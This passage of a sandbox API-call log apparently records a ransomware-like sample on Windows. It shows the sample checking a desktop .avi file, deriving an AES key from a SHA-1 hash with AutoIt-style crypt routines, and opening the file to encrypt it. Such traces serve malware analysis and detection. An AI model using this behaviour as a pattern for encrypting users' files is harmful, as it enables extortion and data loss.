hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0076.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.594] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.594] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.594] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0076.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0076.594] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0076.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0076.595] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0076.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0076.595] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0076.595] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0076.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0076.595] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.595] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0076.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.595] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89da8c90, ftCreationTime.dwHighDateTime=0x1d5dddd, ftLastAccessTime.dwLowDateTime=0xab43cd40, ftLastAccessTime.dwHighDateTime=0x1d5d90c, ftLastWriteTime.dwLowDateTime=0xab43cd40, ftLastWriteTime.dwHighDateTime=0x1d5d90c, nFileSizeHigh=0x0, nFileSizeLow=0xeb7c, dwReserved0=0x0, dwReserved1=0x657690, cFileName="7zcAt1JobB0Roi5s.avi", cAlternateFileName="7ZCAT1~1.AVI")) returned 0x6b89b8 [0076.595] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0076.596] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89da8c90, ftCreationTime.dwHighDateTime=0x1d5dddd, ftLastAccessTime.dwLowDateTime=0xab43cd40, ftLastAccessTime.dwHighDateTime=0x1d5d90c, ftLastWriteTime.dwLowDateTime=0xab43cd40, ftLastWriteTime.dwHighDateTime=0x1d5d90c, nFileSizeHigh=0x0, nFileSizeLow=0xeb7c, dwReserved0=0x0, dwReserved1=0x657690, cFileName="7zcAt1JobB0Roi5s.avi", cAlternateFileName="7ZCAT1~1.AVI")) returned 0x6b89b8 [0076.596] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zcAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cAt1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="At1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JobB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="obB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bB0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Roi5s.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.597] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.597] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.598] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89da8c90, ftCreationTime.dwHighDateTime=0x1d5dddd, ftLastAccessTime.dwLowDateTime=0xab43cd40, ftLastAccessTime.dwHighDateTime=0x1d5d90c, ftLastWriteTime.dwLowDateTime=0xab43cd40, ftLastWriteTime.dwHighDateTime=0x1d5d90c, nFileSizeHigh=0x0, nFileSizeLow=0xeb7c, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="7zcAt1JobB0Roi5s.avi", cAlternateFileName="7ZCAT1~1.AVI")) returned 0x6b89f8 [0076.598] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0076.598] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.598] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.598] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0076.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0076.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0076.598] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0076.599] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x6969c0) returned 1 [0076.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0076.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0076.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0076.600] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.600] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.600] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.600] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.600] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.600] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.601] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.601] CryptCreateHash (in: hProv=0x6969c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0076.601] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0076.601] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.601] CryptHashData (hHash=0x6b8b38, pbData=0x6f9748, dwDataLen=0x16, dwFlags=0x1) returned 1 [0076.601] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.601] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.601] CryptDeriveKey (in: hProv=0x6969c0, Algid=0x660e, hBaseData=0x6b8b38, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8ab8) returned 1 [0076.601] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.601] CryptDestroyHash (hHash=0x6b8b38) returned 1 [0076.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7zcat1jobb0roi5s.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0076.602] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.602] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0076.602] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0076.602] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0076.602] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x698698 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.602] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: 